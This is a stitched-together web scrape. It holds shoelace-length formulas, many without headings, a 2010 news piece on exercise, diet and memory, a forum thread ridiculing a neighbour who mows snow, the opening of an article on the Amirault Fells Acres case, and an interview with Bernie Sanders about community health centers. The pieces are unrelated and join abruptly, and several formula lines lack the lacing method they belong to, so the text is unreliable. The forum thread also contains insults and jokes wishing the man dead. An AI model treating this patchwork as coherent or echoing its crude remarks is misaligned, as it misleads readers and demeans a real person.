Method 3 ( Looped lock , Longer ) : = H× 4.1 + ( √( H²+ V² ) ×( P−1 ) +L ) ×2 = H * 4.1 +( SQRT ( H* H+V* V ) * ( P - 1 ) +L ) * 2
( This approximates 5 % longer on two horizontals to allow for loops )
Locked Double Helix Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
NASA Space Boot Lacing ( same formula as Train Track Lacing )
= ( ( H+V ) ×( P− 1 ) +L ) ×2
= ( ( H+V ) * ( P - 1 ) +L ) *
2
=( H+√( H²+ V² ) ×1.05 ×( P− 1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) * 1.05 *( P - 1 ) +L ) *
2
( This approximates 5 % longer diagonals to allow for loop backs )
=H×P + √( H²+ V² ) ×( P−1 ) +L×1.25
=H*P+SQRT ( H*H+V*V ) *( P -1 ) +L*1.25
( This approximates the tied off end at 1/ 4 the length of the loose end )
Over Under Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+ SQRT ( H*H+V*V ) * ( P - 1 ) +L ) *
2
Method 1 or 2 ( Upright pentagrams , Longer ) : = H×3 + V × ( P − 2 ) ×4 + ( √( H² +( V×( P−3 ) ) ² ) + √( ( H÷ 2 ) ² + ( V×( P−2 ) ) ² ) +L) ×2 =H*3+V*( P -2)*4+( SQRT ( H*H+V *( P - 3)*V*( P - 3 ) ) + SQRT ( H*H/4+V *( P - 2 ) *V *( P - 2 ) ) +L ) *
2
Method 3 ( Inverted pentagram , Shorter ) : = H×3 + ( V×( P−1 ) + √( H² +( V×( P−3 ) ) ² ) + √( ( H÷ 2 ) ² + ( V×( P−2 ) ) ² ) +L ) ×2 =H*3+( V*( P - 1 ) +SQRT( H*H+V *( P - 3)*V*( P - 3 ) ) + SQRT ( H*H/4+V *( P - 2 ) *V *( P - 2 ) ) +L ) *
2
Shoes with 4 Pairs of eyelets : =( H+ √( H²+ V² ) + √( H² +( V×2 ) ² ) +L ) ×2+V×2 =( H+SQRT( H*H+V*V ) + SQRT( H*H+V*V*4) +L ) *2+V*2
Shoes with 5 Pairs of eyelets : =( H+ √( H²+ V² ) + √( H² +( V×2 ) ² ) +L ) ×2+V×4 =( H+SQRT( H*H+V*V ) + SQRT( H*H+V*V*4)+L ) *2+V*4
Shoes with 6 Pairs of eyelets : =( H+ √( H² + V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) +L ) ×2+V×6 =( H+ SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H*H+V*V*9 )+L ) *2+V*6
Shoes with 7 Pairs of eyelets : =( H+ √( H² + V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) +L ) ×2+V×8 =( H+ SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H*H+V*V*9 ) +L ) *2+V*8
Shoes with 8 Pairs of eyelets : =( H+ √( H² + V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) + √( H² +( V×4 ) ² ) +L ) ×2+V×6 =( H+ SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H*H+V*V*9 ) + SQRT ( H*H+V*V*16 )+L ) *2+V*6
Shoes with 4 Pairs of eyelets : =( H+ √( H²+ V² ) + √( H² +( V×2 ) ² ) +L ) ×2 =( H+ SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) +L ) *
2
Shoes with 5 Pairs of eyelets : =( H+ √( H²+ V² ) ×2 + √( H² +( V×2 ) ² ) +L ) ×2 =( H+ SQRT ( H*H+V*V ) * 2+SQRT( H*H+V*V*4 ) +L ) *
2
Shoes with 6 Pairs of eyelets : =( H+V+ √( H²+ V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) +L ) ×2 =( H+V+SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H* H+V*V*9 ) +L ) *
2
Shoes with 7 Pairs of eyelets : =( H+V+ √( H² + V² ) ×2 + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) +L ) ×2 =( H+V+SQRT( H*H+V*V ) * 2+SQRT( H*H+V*V*4 ) + SQRT ( H* H+V*V*9 ) +L ) *
2
Shoes with 8 Pairs of eyelets :
Method 1 ( High horizontal section , Shorter ) : =( H+V×2 + √( H² + V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) + √( H² +( V×4 ) ² ) +L ) ×2 =( H+V*2+SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H*H+V*V*9 ) + SQRT ( H*H+V*V*16 ) +L ) *
2
Shoes with 8 Pairs of eyelets :
Method 2 ( Low horizontal section , Longer ) : =( H+V×5 + √( H² + V² ) + √( H² +( V×2 ) ² ) + √( H² +( V×3 ) ² ) + √( H² +( V×4 ) ² ) +L ) ×2 =( H+V*5 + SQRT( H* H+V*V ) + SQRT( H*H+V*V*4 ) + SQRT ( H*H+V*V*9 ) + SQRT ( H*H+V*V*16 ) +L ) *
2
=H×( P−2 + ( P MODULO 2 ) ) +V× (( P−2 ) ×2 +( P MODULO 2 ) ) ×2+L×2
=H*( P-2+MOD ( P,2 ) ) +V*(( P -2)*2+MOD ( P,2 ) ) *2+L*2
=H×P + √( H²+ V² ) ×( P−2 ) + √( H² +( V×INT ( ( P+1 ) ÷ 2 ) ) ² ) +√( H² +( V×INT ( P÷ 2 ) ) ² ) +L×2
=H*P+SQRT ( H*H+V*V ) *( P - 2 ) +SQRT( H*H+V*INT (( P+1)/2)*V*INT(( P+1)/2 ) ) + SQRT( H*H+V*INT ( P/2 ) *V*INT ( P/2 ) ) +L*2
Riding Boot Lacing ( same formula as Shoe Shop Lacing )
=H×P + √( H²+ V² ) ×( P−1 ) + √( H² +( V×( P−1 ) ) ² ) +L×2
=H*P+SQRT ( H*H+V*V ) *( P - 1 ) +SQRT( H*H+V *( P-1)*V*( P - 1 ) ) +L*2
Shoes with 4 , 10 , 16 , 22 , etc. sets of eyelets :
Method 1 ( " I " at bottom , Short ) : =( H × ( P+2 ) + V×( P×5−8 ) ) ÷3 +( √( H²+ V² ) ×( P−1 ) ÷3+L ) ×2 =( H*( P+2 ) +V*( P*5-8) )/3+( SQRT( H*H+V*V ) *( P -1)/3+L ) *
2
Shoes with 4 , 10 , 16 , 22 , etc. sets of eyelets :
Method 2 ( " X " at bottom , Long ) : =( H × ( P+2 ) + V×( P×5−2 ) ) ÷3 +( √( H²+ V² ) ×( P−1 ) ÷3+L ) ×2 =( H*( P+2 ) +V*( P*5 -2) )/3+( SQRT( H*H+V*V ) *( P -1)/3+L ) *
2
Shoes with 8 , 14 , 20 , 26 , etc. sets of eyelets :
Method 1 ( " I " at bottom , Short ) : =( H × ( P+4 ) + V× ( P×5−4 ) ) ÷3 + ( √( H²+ V² ) ×( P−2 ) ÷3+L ) ×2 =( H*( P+4 ) +V*( P*5 -4) )/3+( SQRT( H*H+V*V ) *( P -2)/3+L ) *
2
Shoes with 8 , 14 , 20 , 26 , etc. sets of eyelets :
Method 2 ( " X " at bottom , Ends tied at side , Medium ) : =( H × ( P−2 ) + V× ( P×5−4 ) ) ÷3 + ( √( H²+ V² ) ×( P+1 ) ÷3+L ) ×2 =( H*( P - 2 ) +V*( P*5 -4) )/3+( SQRT( H*H+V*V ) *( P+1)/3+L ) *
2
Shoes with 8 , 14 , 20 , 26 , etc. sets of eyelets :
Method 3 ( " X " at bottom , Ends tied across top , Long ) : =( H × ( P+4 ) + V×( P×5−10 ) ) ÷3 + ( √( H²+ V² ) ×( P+1 ) ÷3+L ) ×2 =( H*( P+4 ) +V*( P*5-10 ) )/3+( SQRT ( H*H+V*V ) *( P+1)/3+L ) *
2
All other combinations : =( H×INT ( ( P+5 ) ÷6 ) +V×INT ( ( P − 1 ) ×5÷6 ) +√( H²+ V² ) ×INT (( P+1 ) ÷3 ) +L ) ×2 =( H* INT (( P+5)/6 ) +V*INT ( ( P - 1 ) * 5/6 ) + SQRT( H*H+V*V ) * INT ( ( P+1 ) /3) +L ) *
2
=H×P + √( H² +( V×2 ) ² ) ×( P− 2 ) +( V+L ) ×2
=H*P+SQRT ( H*H+V*V*4 ) *( P - 2 ) +( V+L ) *
2
Lace 1 ( Shorter segment ) : =( H+√( H²+ V² ) ×INT ( ( P − 2 ) ÷2 ) +L ) ×2 =( H+ SQRT( H*H+V*V ) * INT ( ( P - 2)/2 ) +L ) *
2
Lace 2 ( Longer segment ) : =( H+√( H²+ V² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+ SQRT( H*H+V*V ) * INT ( ( P - 1) /2 ) +L ) *
2
( For even numbers of eyelet pairs , both formulas work out the same )
Method 1 ( Long diagonal , Longer ) ( same formula as Riding Boot Lacing ) : =H×P + √( H² + V² ) ×( P− 1 ) + √( H² +( V ×( P−1 ) ) ² ) +L×2 =H*P+SQRT( H*H+V*V ) *( P -1 ) +SQRT( H*H+V *( P-1)*V*( P -1 ) ) +L*2
Method 2 ( Long straight , Shorter ) : =( H+V ) ×P+ √( H²+ V² ) ×( P−2 ) +L×2 =( H+V ) * P+SQRT( H*H+V*V ) *( P - 2) +L*2
=( H +( V+ √( H² +( V×2 ) ² ) ) ×( P− 2 ) +L ) ×2
=( H+( V+SQRT ( H*H+V * V* 4 ) ) * ( P - 2) +L ) *
2
=( H+V×INT ( P÷ 2 ) +L ) ×2 ...
... +√( H² +( V×2 ) ² ) ×2 ( for 3 or more eyelet pairs ) ...
... +√( H² +( V×4 ) ² ) ×2 ( for 5 or more eyelet pairs ) ...
... +√( H² +( V×6 ) ² ) ×2 ( for 7 or more eyelet pairs ) ...
... +√( H² +( V×8 ) ² ) ×2 ( for 9 or more eyelet pairs ) ... ( etc. )
=( H+V*INT ( P/2 ) +L ) * 2 ...
... + SQRT ( H*H+V * V * 2*2 ) * 2 ( for 3 or more eyelet pairs ) ...
... + SQRT ( H*H+V * V * 4*4 ) * 2 ( for 5 or more eyelet pairs ) ...
... + SQRT ( H* H+V * V * 6*6 ) * 2 ( for 7 or more eyelet pairs ) ...
... + SQRT ( H*H+V * V * 8*8 ) * 2 ( for 9 or more eyelet pairs ) ... ( etc. )
=( H×INT ( ( P+1 ) ÷2 ) + V× ( P−1 ) +L ) ×2
=( H* INT ( ( P+1 ) /2 ) +V*( P - 1 ) +L ) *
2
Straight Easy Lacing ( same formula as Straight Bar Lacing )
=( H×INT ( ( P+1 ) ÷2 ) + V× ( P−1 ) +L ) ×2
=( H* INT ( ( P+1 ) /2 ) +V*( P - 1 ) +L ) *
2
=H×P + ( √( H²+ V² ) + L ) ×2 + √( H² +( V×2 ) ² ) ×( P−2 )
=H*P+( SQRT ( H*H+V*V ) +L ) * 2+SQRT(H*H+V* V*4 ) *( P - 2 )
= ( H+L ) ×2 ...
... +√( H² +( V×1 ) ² ) ×2 ( for 2 or more eyelet pairs ) ...
... +√( H² +( V×2 ) ² ) ×2 ( for 3 or more eyelet pairs ) ...
... +√( H² +( V×3 ) ² ) ×2 ( for 4 or more eyelet pairs ) ...
... +√( H² +( V×4 ) ² ) ×2 ( for 5 or more eyelet pairs ) ... ( etc. )
= ( H+L ) * 2 ...
... + SQRT ( H*H+V * V * 1*1 ) * 2 ( for 2 or more eyelet pairs ) ...
... + SQRT ( H*H+V * V * 2*2 ) * 2 ( for 3 or more eyelet pairs ) ...
... + SQRT ( H*H+V * V * 3*3 ) * 2 ( for 4 or more eyelet pairs ) ...
... + SQRT ( H*H+V * V * 4*4 ) * 2 ( for 5 or more eyelet pairs ) ... ( etc. )
Train Track Lacing ( same formula as NASA Space Boot Lacing )
= ( ( H+V ) ×( P− 1 ) +L ) ×2
= ( ( H+V ) * ( P - 1 ) +L ) *
2
=( H+√( H²+ V² ) ×1.07 ×( P− 1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) * 1.07 *( P - 1 ) +L ) *
2
( This approximates 7 % longer diagonals to allow for twists )
=( H+ √( H²+ V² ) ×( P−3 ) + √( H² +( V×2 ) ² ) ×2+L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 3 ) +SQRT( H*H+V*V*4 ) *2+L ) *
2
Method 1 ( Ends stop - knotted ) : =H+( √( H²+ V² ) ×( P−2 ) +L ) ×2 =H +( SQRT ( H* H+V* V ) * ( P - 2 ) +L ) *
2
Method 2 ( Ends tied together ) : =( H+ √( H² + V² ) ×( P−2 ) +L ) ×2 =( H+ SQRT ( H*H+V*V ) *( P - 2 ) +L ) *
2
= ( H+V × ( P−3 ) + √( H² +( V×2 ) ² ) ×( P− 2 ) +L ) ×2
=( H+V *( P - 3 ) + SQRT ( H*H+V * V * 4 ) * ( P - 2 ) +L ) *
2
=( H+V × ( P−1 ) +L ) ×2
=( H+V *( P - 1 ) +L ) *
2
=( H+ √( ( H×3 ) ²+( V×3 ) ² ) ×1.05 ×( P− 1 ) +L ) ×2
=( H+SQRT ( H*H*9+V*V*9 ) * 1.05 *( P - 1 ) +L ) *
2
( This approximates 5 % longer diagonals to allow for weaving )
= ( H+L ) ×2 +( V+ √( ( H × 2 ) ² + V² ) ) ×( P−1 )
=( H+L ) * 2+( V+SQRT ( H*H * 4+V* V ) ) * ( P - 1 )
=H×( P+1 ) + √( H² +( V×2 ) ² ) ×( P−1 ) +L×2
=H*( P+1 ) +SQRT( H*H+V*V*4 ) *( P -1) +L*2
( This approximates diagonals at half the horizontal spacing )
Method 1 ( Verticals at bottom , Shorter ) : =( H+V×INT ( P÷ 2 ) + W×INT ( ( P+1 ) ÷ 2 ) + √( H² +( V−W ) ² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+V*INT ( P/2 ) + W*INT ( ( P+1)/2 ) +SQRT(H*H+( V - W ) *( V - W ) ) * INT ( ( P - 1) /2 ) +L ) *
2
Method 2 ( Diagonals at bottom , Longer ) : =( H+V×INT ( ( P − 1 ) ÷2 ) + W×INT ( P÷ 2+1 ) +√( H² +( V−W ) ² ) ×INT ( P÷2 ) +L ) ×2 =( H+V*INT (( P - 1)/2 ) +
W*INT ( P/2+1 ) + SQRT ( H*H+( V - W ) *( V - W ) ) * INT ( P/2) +L) *
2
( For odd numbers of lug pairs , both formulas work out the same )
=( H+ W×P + √( H² +( V−W ) ² ) ×( P− 1 ) + L ) ×2
=( H+ W * P+ SQRT ( H*H + ( V - W ) * ( V - W ) ) * ( P - 1 ) +L ) *
2
Lace 1 ( Bottom , Longer ) : =( H+ W×INT ( ( P+1 ) ÷ 2 ) + √( H² +( V×2−W ) ² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+ W*INT ( ( P+1) /2 ) +SQRT(H*H+( V*2 - W ) *( V * 2 - W ) ) * INT ( ( P - 1) /2 ) +L ) *
2
Lace 2 ( Second , Shorter ) : =( H+ W×INT ( P÷ 2 ) + √( H² +( V×2−W ) ² ) ×INT ( ( P − 2 ) ÷2 ) +L ) ×2 =( H+ W*INT ( P/2 ) + SQRT( H*H+( V*2 - W ) *( V* 2 - W ) ) * INT ( ( P - 2)/2 ) +L ) *
2
( For even numbers of lug pairs , both formulas work out the same )
=( H+ W×P + √( H² + V² ) + √( H² +( V×2−W ) ² ) ×( P− 2 ) +L ) ×2
=( H+ W * P+ SQRT ( H* H+V*V ) + SQRT ( H*H + ( V * 2 - W ) *( V * 2 - W ) ) *( P - 2 ) +L ) *
2
=( H+ W×P + √( H² +( V+W ) ² ) ×( P− 1 ) +L ) ×2
=( H+ W * P+ SQRT ( H*H +( V+ W ) *( V+W ) ) * ( P - 1 ) +L ) *
2
= ( H ×( P+3 ) + W× ( P×3+1 ) ) ÷2 + √( H² +( V×2 ) ² ) ×( P−1 ) +L×2
=( H*( P+3 ) +
W*( P*3+1 ) )/2+SQRT(
H*H+V*V*4 ) *( P - 1) +L*2
( Only applicable when number of lug pairs P = 5 , 9 , 13 , 17 , 21 , etc. )
=( H+V+W × ( P− 1 ) + √( H² +( V−W ) ² ) ×( P− 2 ) +L ) ×2
=( H+V+ W *( P - 1 ) + SQRT(H*H+( V - W ) *( V - W ) ) *( P - 2) +L ) *
2
= ( H+V × ( P−1 ) + W× ( P+1 ) + √( H² + W² ) ×P+L ) ×2
=( H+V *( P - 1 ) +
W*( P+1 ) + SQRT ( H*H+ W *W ) * P+L ) *
2
=( H+W×P + √( H² +( V−W ) ² ) ×1.03 ×( P− 1 ) +L ) ×2
=( H+ W* P+SQRT ( H*H+( V - W ) *( V - W ) ) * 1.03 *( P - 1 ) +L ) *
2
( This approximates 3 % longer diagonals to allow for knots )
=( H+ W×P + √( H² +( V−W ) ² ) ×( P−0.75 ) +L) ×2
=( H+ W* P+SQRT ( H*H+( V - W ) *( V - W ) ) * ( P - 0.75 ) +L ) *
2
( This approximates 25 % longer on two diagonals to allow for knot )
Method 1
( No lock at top , Shorter ) : =( H +( V+W ) ×( P− 1 ) + √( H² + W² ) ×( P−2 ) +L ) ×2 =( H+( V+W ) *( P - 1 ) + SQRT ( H* H+ W * W ) *( P - 2 ) +L ) *
2
Method 2
( With lock at top , Longer ) : =( H+( V+W + √( H² + W² ) ) ×( P−1 ) +L ) ×2 =( H+( V+W+SQRT ( H* H+ W * W ) ) *( P - 1 ) +L ) *
2
=( H+ W×P + ( √( H² + ( V+W ) ² ) + √( H² +( V×2−W ) ² ) ×2 ) ×INT ( ( P − 1 ) ÷3 ) +L ) ×2
=( H+ W*P +( SQRT ( H*H +( V+ W ) *( V+W ) ) +
SQRT( H*H+( V*2 - W ) *( V*2 - W ) ) * 2 ) * INT ( ( P - 1)/3) +L ) *
2
=( H+V+W × ( P− 1 ) + √( H² +( V−W ) ² ) ×( P− 2 ) + √( H² + (( V+W ) ÷ 2 ) ² ) +L) ×2
=( H+V+ W *( P - 1 ) + SQRT( H*H+( V - W ) *( V - W ) ) *( P - 2 ) +SQRT( H*H+( V+W )/2*( V+W )/2)+L ) *
2
=( H+W×P + √( H² +( V−W ) ² ) ×1.05 ×( P− 1 ) +L ) ×2
=( H+ W* P+SQRT ( H*H+( V - W ) *( V - W ) ) * 1.05 *( P - 1 ) +L ) *
2
( This approximates 5 % longer diagonals to allow for loop backs )
Lace 1 ( Shorter segment ) : =( H+ W×INT ( P÷ 2 ) + √( H² +( V−W ) ² ) ×INT ( P÷2−1 ) +L ) ×2 =( H+ W*INT ( P/2 ) + SQRT( H*H+( V - W ) *( V - W ) ) * INT ( P/2-1 ) +L ) *
2
Lace 2 ( Longer segment ) : =( H+ W×INT ( ( P+1 ) ÷2 ) + √( H² +( V−W ) ² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+ W*INT ( ( P+1) /2 ) +SQRT(H*H+( V - W ) *( V - W ) ) * INT ( ( P - 1) /2 ) +L ) *
2
( For even numbers of lug pairs , both formulas work out the same )
=( H+ W ×P+L ) ×2 + √( H² +( V−W ) ² ) ×( P×2−3 ) + √( H² +( V×( P− 1 ) − W ) ² )
=( H+ W * P+L ) * 2+ SQRT ( H*H + ( V - W ) *( V - W ) ) * ( P * 2 - 3 ) +SQRT ( H*H + ( V *( P - 1 ) - W ) *( V *( P - 1 ) - W ) )
=( H+( V+ √( H² +( V+V+W ) ² ) ×( P− 2 ) + W × ( P− 1 ) +L ) ×2
=( H+( V+SQRT ( H*H+( V+V+W ) *( V+V+ W ) ) *( P - 2 ) + W * ( P - 1 ) +L ) *
2
Method 1 ( Single pass at top / bottom , Shorter ) : =(( H+V+W ) ×( P− 1 ) + L ) ×2 =( ( H+V+ W ) *( P - 1 ) +L ) *
2
Method 2 ( Single pass at top / bottom , Longer ) : =( ( H+W ) ×( P+1 ) + V×( P−1 ) +L ) ×2 =( ( H+ W ) *( P+1 ) + V *( P - 1 ) +L ) *
2
=( H+W×P + √( H² +( V−W ) ² ) ×1.07 ×( P− 1 ) +L ) ×2
=( H+ W* P+SQRT ( H*H+( V - W ) *( V - W ) ) * 1.07 *( P - 1 ) +L ) *
2
( This approximates 7 % longer diagonals to allow for twists )
= (( H+ √( H² +( V+W ) ² ) ×( P−1 ) ) ×1.03 +W×P+L ) ×2
=(( H+ SQRT ( H*H+( V+W ) *( V+W ) ) *( P - 1 ) ) * 1.03 + W* P+L ) *
2
( This approximates 3 % longer segments to allow for knots )
Tips for Boosting Your Memory : Running , Blueberries ?
Study suggests running could stimulate brain to grow new cells .
Jan. 22 , 2010  --
Could you run your way to a better memory ?
Maybe so .
Earlier this week , scientists published a study adding more fuel to the growing belief that exercise boosts brain health .
The study , published in the Proceedings of the National Academy of Sciences and conducted by the U.S. National Institute on Aging in Maryland , found that running led to the growth of new brain cells and improved performance .
Henriette van Praag , a scientist the National Institute on Aging , said that though scientists previously observed the effects of running on brain health , it was never clear that there was a causal relationship .
With this study , she said they " got a little closer . "
The scientists observed two groups of mice -- one group had access to a running wheel , the other did not .
At first , during a training run , the mice were shown two boxes on a touch screen computer .
If they touched the left box , they were given a sugar pellet .
If they touched the right box , they were given nothing .
Then the mice were subject to a memory test involving the same squares .
The more they touched the correct box , the higher they scored .
As the trial continued , the boxes were moved closer together and van Praag said that 's when the effects of running were most visible .
" When we brought them close together , the effect of running kicked in at that time , " she said .
" Animals that did best on the test also had the greatest number of new neurons . "
She said research has long shown that exercise is beneficial for brain function and memory – this study helps show why .
John Grohol , a clinical psychologist and founder of the online mental health resource PsychCentral.com , said that exercise is one of the best things you can do to keep your brain healthy .
" This study just adds to the evidence that physical activity can enhance and keep our brains healthy , " he said .
Improve Your Memory With Diet , Meditation ?
So what are other potential memory boosters ?
Blueberries –
This week , scientists published research suggesting that antioxidant - rich blueberries could improve memory in older adults .
The study , involving scientists from the University of Cincinnati , the U.S. Department of Agriculture , and the Canadian Department of Agriculture , included volunteers in their 70s .
One group drank the equivalent of 2 to 2.5 cups of blueberry juice every day for two months .
The control group drank a blueberry - less juice .
The scientists said the group that drank blueberry juice demonstrated improvement on memory and learning tests .
" These preliminary memory findings are encouraging and suggest that consistent supplementation with blueberries may offer an approach to forestall or mitigate neurodegeneration , " the report said .
Diet – A study in the Proceedings of the National Academy of Sciences in January 2009 found a definite link between caloric restriction and mental function .
But though experts say the phenomenon makes sense from a physiological perspective , the number of participants in the program was small , which makes it difficult to determine how the program would affect a wider population .
Meditation – " People who meditate , research has shown , have a better ability to cultivate positive emotions , " Grohol said .
" In doing so , they help maintain their own emotional stability which helps with overall well - being and brain health . "
In May , Psychological Science published a study indicating that a certain type of meditation may help the brain hold on to images for short periods .
New Experiences – " The brain seems to really benefit from novelty and new experiences , " said Grohol .
But instead of paying money for so - called brain games that may or may not be effective , Grohol suggests people can just do crossword puzzles or play Sudoku games .
Learning new languages and other similar pursuits are also good for the brain .
You are not logged in .
Login or Signup
TJ : from earlier , man down the road mowing the snow .
He kept emptying the bag , but it did n't seem to be working .
It 's snowing again now :)
He kept emptying the bag , but it did n't seem to be working .
It 's snowing again now :) archived ) ( , Fri 8 Jan 2010 , 13:32 ,
MOW THAT SNOW !
( , Fri 8 Jan 2010 , 13:32 , archived ) ( , Fri 8 Jan 2010 , 13:32 ,
Needs more FAIL
( , Fri 8 Jan 2010 , 13:35 , archived ) ( , Fri 8 Jan 2010 , 13:35 ,
YOUR MOTHER WAS A SNOWBLOWER
/ Johnny 5 ( , Fri 8 Jan 2010 , 13:39 , archived ) ( , Fri 8 Jan 2010 , 13:39 ,
What a complete and utter dickhead .
Please print out this thread and shove it through his letterbox ( , Fri 8 Jan 2010 , 13:48 , archived ) ( , Fri 8 Jan 2010 , 13:48 ,
utterly bizarre
( , Fri 8 Jan 2010 , 13:48 , archived ) ( , Fri 8 Jan 2010 , 13:48 ,
: D
He 's probably knackered his mower now , all that water in the innards ( , Fri 8 Jan 2010 , 13:52 , archived ) ( , Fri 8 Jan 2010 , 13:52 ,
this 3D is crap
( , Fri 8 Jan 2010 , 13:50 , archived ) ( , Fri 8 Jan 2010 , 13:50 ,
Hahahaha
( , Fri 8 Jan 2010 , 13:51 , archived ) ( , Fri 8 Jan 2010 , 13:51 ,
Bit too big for a magic eye , too .
Night all !
( , Fri 8 Jan 2010 , 13:52 , archived ) ( , Fri 8 Jan 2010 , 13:52 ,
haha
I just tried to " magiceye " it and something snapped in the back of my left eye ( , Fri 8 Jan 2010 , 13:57 , archived ) ( , Fri 8 Jan 2010 , 13:57 ,
Your brain :(
( , Fri 8 Jan 2010 , 13:58 , archived ) ( , Fri 8 Jan 2010 , 13:58 ,
Act F.A.S.T .
( , Fri 8 Jan 2010 , 14:01 , archived ) ( , Fri 8 Jan 2010 , 14:01 ,
if you enjoy the crosseyed 3d
www.youtube.com/watch?v=TbqrMTzYaJc archived ) ( , Fri 8 Jan 2010 , 14:10 ,
Is that an electric lead ?
He 's trying to top himself .
( , Fri 8 Jan 2010 , 13:53 , archived ) ( , Fri 8 Jan 2010 , 13:53 ,
Yup !
( , Fri 8 Jan 2010 , 13:53 , archived ) ( , Fri 8 Jan 2010 , 13:53 ,
I hate him .
I hate him so much .
( , Fri 8 Jan 2010 , 13:55 , archived ) ( , Fri 8 Jan 2010 , 13:55 ,
Me too .
You hate the left picture and I 'll hate the right one .
Soo much . :(
( , Fri 8 Jan 2010 , 13:59 , archived ) ( , Fri 8 Jan 2010 , 13:59 ,
who buys a lime green car ?
twunt ( , Fri 8 Jan 2010 , 14:00 , archived ) ( , Fri 8 Jan 2010 , 14:00 ,
lime green car with a chequered roof (!)
( , Fri 8 Jan 2010 , 14:01 , archived ) ( , Fri 8 Jan 2010 , 14:01 ,
B.E.L.L.E.N.D.
( , Fri 8 Jan 2010 , 14:02 , archived ) ( , Fri 8 Jan 2010 , 14:02 ,
oh good god
( , Fri 8 Jan 2010 , 14:02 , archived ) ( , Fri 8 Jan 2010 , 14:02 ,
This is the type of person who would die of starvation if his electric tinopener packed up
( , Fri 8 Jan 2010 , 14:04 , archived ) ( , Fri 8 Jan 2010 , 14:04 ,
what a nutter
where are you ?
It 's bright blue skies here
and very cold ( , Fri 8 Jan 2010 , 14:04 , archived ) ( , Fri 8 Jan 2010 , 14:04 ,
We have clear skies now again
I 'm going outside now with my strimmer ( , Fri 8 Jan 2010 , 14:21 , archived ) ( , Fri 8 Jan 2010 , 14:21 ,
take pictures
you loon !
Imagine the look on your neighbour 's face
Have you got a Hedge Trimmer ?
Fire up the Barbie too ... ( , Fri 8 Jan 2010 , 14:26 , archived ) ( , Fri 8 Jan 2010 , 14:26 ,
Hahaha
I might take the hedgetrimmer to the snowmen .
That 'd be fantastic .
The Sussex Hedgetrimmer Massacre :D ( , Fri 8 Jan 2010 , 14:30 , archived ) ( , Fri 8 Jan 2010 , 14:30 ,
please trell me he 's managed to kill himself !
( , Fri 8 Jan 2010 , 14:11 , archived ) ( , Fri 8 Jan 2010 , 14:11 ,
stupid is what stupid does .
( , Fri 8 Jan 2010 , 14:22 , archived ) ( , Fri 8 Jan 2010 , 14:22 ,
The story of the Amiraults of Massachusetts , and of the prosecution that had turned the lives of this thriving American family to dust , was well known to the world by the year 2001 .
It was well known , especially , to District Attorney Martha Coakley , who had by then arrived to take a final , conspicuous , role in a case so notorious as to assure that the Amiraults ' name would be known around the globe .
The Amiraults were a busy , confident trio , grateful in the way of people who have found success after a life of hardship .
Violet had reared her son Gerald and daughter Cheryl with help from welfare , and then set out to educate herself .
The result was the triumph of her life — the Fells Acres school — whose every detail Violet scrutinized relentlessly .
Not for nothing was the pre-school deemed by far the best in the area , with a long waiting list for admission .
All of it would end in 1984 , with accusations of sexual assault and an ever - growing list of parents signing their children on to the case .
Newspaper and television reports blared a sensational story about a female school principal , in her 60s , who had daily terrorized and sexually assaulted the pupils in her care , using sharp objects as her weapon .
So too had Violet 's daughter Cheryl , a 28 - year old teacher at the school .
Sen. Bernie Sanders : Health - care bill could spark " a revolution in primary health care "
Tell me a bit about the provisions to expand community health centers that you added into the Senate bill .
In most areas of Vermont right now , you can drive to a community health center near you where you ’ll get excellent quality primary health care .
If you have no health insurance , you ’re charged on a sliding scale basis .
If you have Medicare or Medicaid , they ’re delighted to have you .
And private health insurance , that ’s great , too .
We ’ve gone from two community health centers in Vermont to eight .
And those eight centers have 41 separate locations and are used by about 100,000 people – and that ’s in a population a bit over 600,000 .
So we know they work .
As of this point , we have added $ 10 billion for the program in the Senate bill .
Congressman Jim Clyburn has added $ 14 billion in the House bill .
And my hope is the conference committee will go with the $ 14 billion .
What we would do with $ 14 billion is expand access from the current 20 million people served by community health centers to 45 million people .
It will mean establishing CHCs and their satellites in 10,000 new communities .
What it also means is that we will dramatically increase funding for the National Health Service Corps so we have an additional 20,000 doctors , dentists and nurses .
It ’s a revolution in primary health care if we get what I hope we get .
Let ’s focus on that for a second .
One of the issues in the health - care system that has n’t gotten enough attention is the focus on specialty medicine .
Those doctors make more money , so more and more medical students are going in that direction , but they also cost a lot more money , as they create demand for expensive procedures .
I ’ve heard people say we can afford a universal primary - health - care system , but not a universal specialty - health - care system .
We need to expand the National Health Service Corps .
If you go to the University of Vermont , you ’re going to graduate with $ 150,000 in debt .
So you become a specialist and make a lot of money and repay the debt .
But we ’re going to give the NHSC enough money to forgive the debt of 20,000 students to practice in underserved communities .
The other thing we need to do is raise the reimbursement for primary - care doctors .
And these community health centers are sort of seen as a front line for access to primary care ?
When we talk about health care , people tend to talk about insurance .
But equally important is access .
You need to be able to find a primary - care physician and a dentist and a mental - health counselor .
The $ 14 billion will have a profound impact on addressing the crisis in primary care in this country .
We ’re not graduating enough primary - care doctors , and even people with insurance often can’t find one .
But the insanity is that we ’re not just depriving people of primary care they need , but we ’re sending them to the emergency room .
And the emergency room will treat you for the common cold and charge $ 600 to $ 1,000 , and the community health center will cost $ 100 .
